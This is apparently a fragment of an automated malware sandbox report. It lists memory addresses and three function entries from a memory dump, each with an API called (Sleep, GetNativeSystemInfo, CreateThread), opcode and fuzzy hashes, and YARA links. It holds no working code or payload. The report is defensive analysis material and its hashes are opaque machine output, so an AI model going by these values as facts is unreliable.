                                                                                                                                                                                                    0x00202454
                                                                                                                                                                                                    0x00202456
                                                                                                                                                                                                    0x0020245a
                                                                                                                                                                                                    0x00202460
                                                                                                                                                                                                    0x00202468
                                                                                                                                                                                                    0x0020246e
                                                                                                                                                                                                    0x00202472
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00202474
                                                                                                                                                                                                    0x00202482
                                                                                                                                                                                                    0x0020248c
                                                                                                                                                                                                    0x0020249d
                                                                                                                                                                                                    0x0020249f
                                                                                                                                                                                                    0x002024a4
                                                                                                                                                                                                    0x002024a7
                                                                                                                                                                                                    0x002024b0
                                                                                                                                                                                                    0x002024bf
                                                                                                                                                                                                    0x002024c1
                                                                                                                                                                                                    0x002024cc
                                                                                                                                                                                                    0x002024d2
                                                                                                                                                                                                    0x002024d7
                                                                                                                                                                                                    0x002024db
                                                                                                                                                                                                    0x002024e0
                                                                                                                                                                                                    0x002024e2
                                                                                                                                                                                                    0x002024f0
                                                                                                                                                                                                    0x002024f0
                                                                                                                                                                                                    0x002024fc
                                                                                                                                                                                                    0x00202501
                                                                                                                                                                                                    0x00202504
                                                                                                                                                                                                    0x0020250d
                                                                                                                                                                                                    0x0020250d
                                                                                                                                                                                                    0x00202504
                                                                                                                                                                                                    0x002024cc
                                                                                                                                                                                                    0x002024bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x002024a7

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000006.00000002.2114408052.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                                    • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                    • Instruction ID: 6acef987b91d238e731fd9a5f681704869e5b00656527f97a441a3d0e419367b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0921CF72310B41CAEF14EFB1E8583DD23A2E788784F884426EF0D5769AEE38D529C750
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 0020260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,00201E13), ref: 0020264B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000006.00000002.2114408052.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoNativeSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1721193555-0
                                                                                                                                                                                                    • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                    • Instruction ID: d41baaa2d3036e28e01795de75e0ab1c9d7bec7a3d8c9b824f68205077471eef
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56E01262B25745D2DF15FB20E8583993362FB94704F844226965E426A5EF3CD65DC700
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 00201000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000006.00000002.2114408052.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                    • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                    • Instruction ID: dddc93472b349a903efe13cc16ee5ee983fe16b1b213149b7c6cde98ffc81f68
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1D0A7B2E1034083E7349B10EA5A3992722F3D4315FC0C206CA8944955CF3CC168C600
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Non-executed Functions